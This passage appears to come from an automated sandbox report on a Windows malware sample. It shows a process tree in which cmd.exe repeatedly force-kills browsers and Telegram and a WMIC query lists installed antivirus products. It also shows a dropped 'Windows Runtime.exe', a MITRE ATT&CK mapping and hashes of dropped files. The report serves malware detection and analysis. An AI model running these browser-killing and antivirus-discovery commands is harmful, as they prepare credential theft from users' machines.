        taskkill /F /IM opera.exe
        6⤵
        
        PID:4324
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:1092
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        
        PID:1328
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:4148
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:4596
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:2200
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:1992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:636
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:876
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:3860
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:4272
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:4776
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3172
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        
        PID:3880
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:2944
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4224
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        
        PID:3304
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:1144
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        
        PID:64
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:412
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        
        PID:4168
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:1952
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        
        PID:4364
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:980
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1540
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:3740
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:3428
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:2252
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:4112
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:2684
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:2496
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:680
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:4692
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:2280
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        
        PID:1732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:432
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2900
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        
        PID:1144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:4828
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        
        PID:412
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:1328
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2972
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        
        PID:2064
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:1976
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        
        PID:4400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:1764
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2240
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:4348
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:2332
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:5084
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:4112
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:1208
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:4540
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:1388
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:2060
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
        5⤵
        
        PID:3884
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        6⤵
        
        PID:1508
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"
        5⤵
        
        PID:2500
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        6⤵
        
        PID:4772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"
        5⤵
        
        PID:1792
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM firefox.exe
        6⤵
        
        PID:4376
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM opera.exe"
        5⤵
        
        PID:4400
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM opera.exe
        6⤵
        
        PID:3848
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM yandex.exe"
        5⤵
        
        PID:4288
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM yandex.exe
        6⤵
        
        PID:3428
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM iexplore.exe"
        5⤵
        
        PID:756
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM iexplore.exe
        6⤵
        
        PID:3088
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM brave.exe"
        5⤵
        
        PID:1748
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3484
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM brave.exe
        6⤵
        
        PID:3196
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM vivaldi.exe"
        5⤵
        
        PID:1732
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2280
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM vivaldi.exe
        6⤵
        
        PID:2732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /IM Telegram.exe"
        5⤵
        
        PID:3884
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4644
      - C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM Telegram.exe
        6⤵
        
        PID:432
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        
        PID:2860
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        
        PID:3348

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2172

C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\ProgramData\Windows Runtime.exe
"C:\ProgramData\Windows Runtime.exe"
1⤵
- Executes dropped EXE
PID:1732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
04f1d68afbed6b13399edfae1e9b1472

SHA1
8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

SHA256
f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

SHA512
30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tcl86t.dll

Filesize
1.8MB

MD5
ad03d1e9f0121330694415f901af8f49

SHA1
ad8d3eee5274fef8bb300e2d1f4a11e27d3940df

SHA256
224476bedbcf121c69137f1df4dd025ae81769b2f7651bd3788a870a842cfbf9

SHA512
19b85c010c98fa75eacfd0b86f9c90a2dbf6f07a2b3ff5b4120108f3c26711512edf2b875a782497bdb3d28359325ad95c17951621c4b9c1fd692fde26b77c33

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_squ310mt.wiu.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nyfcwl.exe

Filesize
32.9MB

MD5
cbd5a15f6ee7f3ecea1b42a2307d4d9c

SHA1
cdd0e805d9995a8a2c7d01e3ee4e0fcd21ce24bc

SHA256
9009e81844ccd7abe82324b44b8170dc260b153648e7d0d8bef4449916e3d525

SHA512
f734007d3bda9122e825977b34c8c2240d4e99ca9f0076f98e4b334c21b90ab071eeed96394f1c8e7ed1f08f3ebccca45c071b8a0147d49af9de1d03195a6933

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\VCRUNTIME140.dll

Filesize
94KB

MD5
11d9ac94e8cb17bd23dea89f8e757f18

SHA1
d4fb80a512486821ad320c4fd67abcae63005158

SHA256
e1d6f78a72836ea120bd27a33ae89cbdc3f3ca7d9d0231aaa3aac91996d2fa4e

SHA512
aa6afd6bea27f554e3646152d8c4f96f7bcaaa4933f8b7c04346e410f93f23cfa6d29362fd5d51ccbb8b6223e094cd89e351f072ad0517553703f5bf9de28778

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\_tkinter.pyd

Filesize
60KB

MD5
0f1aa5b9a82b75b607b4ead6bb6b8be6

SHA1
5d58fd899018a106d55433ea4fcb22faf96b4b3d

SHA256
336bd5bffdc0229da4eaddbb0cfc42a9e55459a40e1322b38f7e563bda8dd190

SHA512
b32ea7d3ed9ae3079728c7f92e043dd0614a4da1dbf40ae3651043d35058252187c3c0ad458f4ca79b8b006575fac17246fb33329f7b908138f5de3c4e9b4e52

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\nexusloader.exe

Filesize
3.5MB

MD5
d49ad3045643e283f713eec00504f108

SHA1
67b6af86414d24d2f8d5630fdc91d67ea149e619

SHA256
53a04c25d2943e2b2f0f5cab119bca53be2be6ca96346a4992de0ca929070443

SHA512
e2aa8aed19e29993f9d3fef60ebeb84429df70031c4a14031aa9df4e5b3b555f815b450fbf1ecf6263cba96f86aea1bf7f21af4de18f2033646d5143f7ec1d0d

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\python310.dll

Filesize
4.2MB

MD5
384349987b60775d6fc3a6d202c3e1bd

SHA1
701cb80c55f859ad4a31c53aa744a00d61e467e5

SHA256
f281c2e252ed59dd96726dbb2de529a2b07b818e9cc3799d1ffa9883e3028ed8

SHA512
6bf3ef9f08f4fc07461b6ea8d9822568ad0a0f211e471b990f62c6713adb7b6be28b90f206a4ec0673b92bae99597d1c7785381e486f6091265c7df85ff0f9b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl8\8.5\msgcat-1.6.1.tm

Filesize
33KB

MD5
db52847c625ea3290f81238595a915cd

SHA1
45a4ed9b74965e399430290bcdcd64aca5d29159

SHA256
4fdf70fdcedef97aa8bd82a02669b066b5dfe7630c92494a130fc7c627b52b55

SHA512
5a8fb4ada7b2efbf1cadd10dbe4dc7ea7acd101cb8fd0b80dad42be3ed8804fc8695c53e6aeec088c2d4c3ee01af97d148b836289da6e4f9ee14432b923c7e40

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\auto.tcl

Filesize
20KB

MD5
5e9b3e874f8fbeaadef3a004a1b291b5

SHA1
b356286005efb4a3a46a1fdd53e4fcdc406569d0

SHA256
f385515658832feb75ee4dce5bd53f7f67f2629077b7d049b86a730a49bd0840

SHA512
482c555a0da2e635fa6838a40377eef547746b2907f53d77e9ffce8063c1a24322d8faa3421fc8d12fdcaff831b517a65dafb1cea6f5ea010bdc18a441b38790

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\encoding\cp1252.enc

Filesize
1KB

MD5
5900f51fd8b5ff75e65594eb7dd50533

SHA1
2e21300e0bc8a847d0423671b08d3c65761ee172

SHA256
14df3ae30e81e7620be6bbb7a9e42083af1ae04d94cf1203565f8a3c0542ace0

SHA512
ea0455ff4cd5c0d4afb5e79b671565c2aede2857d534e1371f0c10c299c74cb4ad113d56025f58b8ae9e88e2862f0864a4836fed236f5730360b2223fde479dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\encoding\symbol.enc

Filesize
1KB

MD5
1b612907f31c11858983af8c009976d6

SHA1
f0c014b6d67fc0dc1d1bbc5f052f0c8b1c63d8bf

SHA256
73fd2b5e14309d8c036d334f137b9edf1f7b32dbd45491cf93184818582d0671

SHA512
82d4a8f9c63f50e5d77dad979d3a59729cd2a504e7159ae3a908b7d66dc02090dabd79b6a6dc7b998c32c383f804aacabc564a5617085e02204adf0b13b13e5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\http1.0\pkgIndex.tcl

Filesize
735B

MD5
10ec7cd64ca949099c818646b6fae31c

SHA1
6001a58a0701dff225e2510a4aaee6489a537657

SHA256
420c4b3088c9dacd21bc348011cac61d7cb283b9bee78ae72eed764ab094651c

SHA512
34a0acb689e430ed2903d8a903d531a3d734cb37733ef13c5d243cb9f59c020a3856aad98726e10ad7f4d67619a3af1018f6c3e53a6e073e39bd31d088efd4af

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\init.tcl

Filesize
23KB

MD5
e10e428598b2d5f2054cfae4a7029709

SHA1
f8e7490e977c3c675e76297638238e08c1a5e72e

SHA256
61c55633fa048deb120422daed84224f2bb12c7c94958ca6f679b219cf2fa939

SHA512
88ef7628af5b784229dda6772c6ddd77905238a1648d4290b496eafeec013107437218e4834b7198aeb098bc854dcb9f18083c76dd5bf3ce9cedf3d5c9e4faae

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\opt0.4\pkgIndex.tcl

Filesize
607B

MD5
92ff1e42cfc5fecce95068fc38d995b3

SHA1
b2e71842f14d5422a9093115d52f19bcca1bf881

SHA256
eb9925a8f0fcc7c2a1113968ab0537180e10c9187b139c8371adf821c7b56718

SHA512
608d436395d055c5449a53208f3869b8793df267b8476ad31bcdd9659a222797814832720c495d938e34bf7d253ffc3f01a73cc0399c0dfb9c85d2789c7f11c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\package.tcl

Filesize
22KB

MD5
55e2db5dcf8d49f8cd5b7d64fea640c7

SHA1
8fdc28822b0cc08fa3569a14a8c96edca03bfbbd

SHA256
47b6af117199b1511f6103ec966a58e2fd41f0aba775c44692b2069f6ed10bad

SHA512
824c210106de7eae57a480e3f6e3a5c8fb8ac4bbf0a0a386d576d3eb2a3ac849bdfe638428184056da9e81767e2b63eff8e18068a1cf5149c9f8a018f817d3e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\tclIndex

Filesize
5KB

MD5
996f74f323ea95c03670734814b7887f

SHA1
49f4b9be5ab77e6ccab8091f315d424d7ac183f3

SHA256
962c60eb7e050061462ff72cec9741a7f18307af4aaa68d7665174f904842d13

SHA512
c4694260c733dc534dc1a70791fa29b725efd078a6846434883362f06f7bf080ca07478208b1909630e1b55fbdccf14484b78b0a5b8c6dad90f190c8c9d88a56

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tcl\tm.tcl

Filesize
11KB

MD5
52db1cd97ceab81675e86fa0264ea539

SHA1
b31693b5408a847f97ee8004fed48e5891df6e65

SHA256
6c02298d56e3c4c6b197afc79ec3ce1fc37ae176dc35f5d7ac48246f05f91669

SHA512
5032b0a79d0cd5a342af2f9edf8b88b7214e9aa61ba524a42c5be2286741e18fa380ad2d40dda9a0257afceed2ef6e48624013e854f37b5e41cb88a831ad04c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk86t.dll

Filesize
1.5MB

MD5
e3c7ed5f9d601970921523be5e6fce2c

SHA1
a7ee921e126c3c1ae8d0e274a896a33552a4bd40

SHA256
bd4443b8ecc3b1f0c6fb13b264769253c80a4597af7181884bda20442038ec77

SHA512
bfa76b6d754259eabc39d701d359dd96f7a4491e63b17826a05a14f8fdf87656e8fc541a40e477e4fef8d0601320dd163199520e66d9ee8b5d6bb5cd9a275901

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\button.tcl

Filesize
20KB

MD5
cf6e5b2eb7681567c119040939dd6e2c

SHA1
3e0b905428c293f21074145fe43281f22e699eb4

SHA256
2f013b643d62f08ddaaa1dea39ff80d6607569c9e1acc19406377b64d75ccf53

SHA512
be03edea59be01d2b8de72b6ebe9dceb13d16c522bb5c042cdae83c84eafc6ac7b3650bf924f5f84f4f126634f9d17d74d087316d289f237129921a89aa4e0c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\entry.tcl

Filesize
17KB

MD5
1d9ff9bb7fedb472910776361510c610

SHA1
c190dd07bcc55741b9bdfc210f82df7b7c2fac81

SHA256
dd351da6288cf7e9f367fd97c97cb476193ff7461b25e31667e85fe720edea04

SHA512
85d25622f4e0c9517d8caa454ec4e81c8cbbec25e418f5a2d885d5561999cfb3c3026aac8bf1ca6f9b40993802fda86d60ff8fd2e30a77d56f1c1914af695f03

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\icons.tcl

Filesize
10KB

MD5
2652aad862e8fe06a4eedfb521e42b75

SHA1
ed22459ad3d192ab05a01a25af07247b89dc6440

SHA256
a78388d68600331d06bb14a4289bc1a46295f48cec31ceff5ae783846ea4d161

SHA512
6ecfbb8d136444a5c0dbbce2d8a4206f1558bdd95f111d3587b095904769ac10782a9ea125d85033ad6532edf3190e86e255ac0c0c81dc314e02d95cca86b596

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\listbox.tcl

Filesize
14KB

MD5
b3b6a3bd19ddde4a97ea7cf95d7a8322

SHA1
2f11d97c091de9202f238778c89f13a94a10d3be

SHA256
b92526a55409c67473740551ca128498824d25406e3cc9bb0544e8296d3c5de4

SHA512
f2bc1fbbd20132725d283b9fab20c3e38ed185a62297e1418572c03fa90b3f813b878be281bb4bdfa1c813b7ee7eff11cbb2f89b5411b1707d90b0e5fd746fb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\menu.tcl

Filesize
37KB

MD5
12ec5260eb7435c7170002e011fe8f17

SHA1
e88f5423a7133784a1a2d097c4e602e5de564034

SHA256
588727079af7ecc44755efe33ebb7414ad2ee68390fc249ce073d38e03c78a4e

SHA512
5848e5a642f0cfba8b456a6dcef711737229e5f59beb7981a52440a47f5ba9ec85374be8e8b1ccdd952ac71164da04ff88ef07204fd62509952db2cdb6503700

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\panedwindow.tcl

Filesize
5KB

MD5
2da0a23cc9d6fd970fe00915ea39d8a2

SHA1
dfe3dc663c19e9a50526a513043d2393869d8f90

SHA256
4adf738b17691489c71c4b9d9a64b12961ada8667b81856f7adbc61dffeadf29

SHA512
b458f3d391df9522d4e7eae8640af308b4209ce0d64fd490bfc0177fde970192295c1ea7229ce36d14fc3e582c7649460b8b7b0214e0ff5629b2b430a99307d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\pkgIndex.tcl

Filesize
372B

MD5
d942ff6f65bba8eb6d264db7d876a488

SHA1
74d6ca77e6092d79f37e7a1dcd7cced2e89d89cb

SHA256
e0bac49b9a3f0e50be89f692273cea7b7462bfc3e054f323261ef99b708c70a3

SHA512
3ac7d992300252109606074aefb693a31cd5cceffb6d7b851a2c8895a0d5e165a139b7038657306128af39c44785b7b4da35b8e1aeb4c30f3f7e7cfcfb789c4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\scale.tcl

Filesize
7KB

MD5
1ce32cdaeb04c75bfceea5fb94b8a9f0

SHA1
cc7614c9eade999963ee78b422157b7b0739894c

SHA256
58c662dd3d2c653786b05aa2c88831f4e971b9105e4869d866fb6186e83ed365

SHA512
1ee5a187615ae32f17936931b30fea9551f9e3022c1f45a2bca81624404f4e68022fcf0b03fbd61820ec6958983a8f2fbfc3ad2ec158433f8e8de9b8fcf48476

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\scrlbar.tcl

Filesize
12KB

MD5
b44265f793563ad2ad66865dec63b2c2

SHA1
23e6f7095066ed3b65998324021d665d810e6a93

SHA256
189e7ee4b67861001c714a55880db34acf7d626a816e18b04b232af9e6e33e81

SHA512
3911b13f42091620d8d96ed0cc950792175f88399912092161e1a71f564c7e72b6d448d3b761b6b6b73400ccc8fabd94cb3bfcc8cb3ad8ebdb590c3ffc623dfb

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\spinbox.tcl

Filesize
15KB

MD5
9971530f110ac2fb7d7ec91789ea2364

SHA1
ab553213c092ef077524ed56fc37da29404c79a7

SHA256
5d6e939b44f630a29c4fcb1e2503690c453118607ff301bef3c07fa980d5075a

SHA512
81b4cec39b03fbeca59781aa54960f0a10a09733634f401d5553e1aaa3ebf12a110c9d555946fcdd70a9cc897514663840745241ad741dc440bb081a12dcf411

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\text.tcl

Filesize
32KB

MD5
33230f852aac8a5368aeba1834dcec77

SHA1
beba97c48a110f4a9fe86f60e5fd4ca6ac55e964

SHA256
f26ed909a962d02bc03585a6c756f4fe992c311c7f53648137e427747120b441

SHA512
caac54334c4eb439c18f03eeb5de83aa6bbd6bb07b760a40c60f2d34f5ee1fdd542f83ad427059863f96b0a8f2cb96658171a7cd0c0c2c49e002bd02e6d418f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\tk.tcl

Filesize
23KB

MD5
25094462d2ea6b43133275bf4db31a60

SHA1
6bb76294e8fdf4d40027c9d1b994f1ab0014b81b

SHA256
3e998b41ab23677db31902e1e876e644b279b2e6d8896443f6c434352801cdd1

SHA512
8bdae921f367b864ea7f36c9a549ee870d4e4e3c6e942d70722a84ae6b23ff00a33638d8ca8f3b9b8fe084875ba7c8976975849f4dc47cdb5671df47af68cfab

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\altTheme.tcl

Filesize
3KB

MD5
ae1b9c4dc2de8e899749fb4e1fcb4df6

SHA1
2a09d325ca56c930b3afb1ee43c944fd4416b8e1

SHA256
92b8be9d8934850b6d240b970603b0ad7c6dd4a45134545694fb52966d742861

SHA512
2803f96729805c90143e0c4c9bf25398bac7d6e4402cb09be354c35566fc3c3bd9522372147c0e956bdbbc2943b9aecb0f5c96b527a26fd790b8fdb5b99efe10

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_924_133630461016085588\tk\ttk\button.tcl

Filesize
2KB

MD5
ea7cf40852afd55ffda9db29a0e11322

SHA1
b7b42fac93e250b54eb76d95048ac3132b10e6d8

SHA256
391b6e333d16497c4b538a7bdb5b16ef11359b6e3b508d470c6e3703488e3b4d

SHA512
